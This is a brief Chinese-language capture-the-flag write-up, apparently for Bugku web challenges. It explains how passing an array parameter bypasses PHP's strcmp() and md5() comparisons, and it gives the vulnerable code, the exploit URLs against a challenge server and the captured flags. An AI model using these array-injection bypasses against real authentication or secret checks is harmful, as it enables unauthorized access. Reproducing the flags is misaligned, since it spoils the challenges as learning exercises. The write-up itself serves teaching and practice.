一、“strcmp比较字符串”
本题使用strcmp()函数漏洞实现,基于PHP5.3以前版本
若strcmp传入参数并非未字符串时,虽然会报错但是函数合法
<?php
$flag = "flag{xxxxx}";
if (isset($_GET['a'])) {
if (strcmp($_GET['a'], $flag) == 0)
die('Flag: '.$flag);
else
print 'No';
}
?>
因此只需要上传一个变量名为a
的非字符串变量,此处考虑使用数组
http://123.206.87.240:9009/6.php?a[]
flag{bugku_dmsj_912k}
二、“md5()函数”
–>PHP绕过md5函数传送门<– PHP绕过md5()
http://123.206.87.240:9009/18.php?username[] = '1' & password[] = '2'
flag{bugk1u-ad8-3dsa-2}
完
欢迎在评论区留言
感谢浏览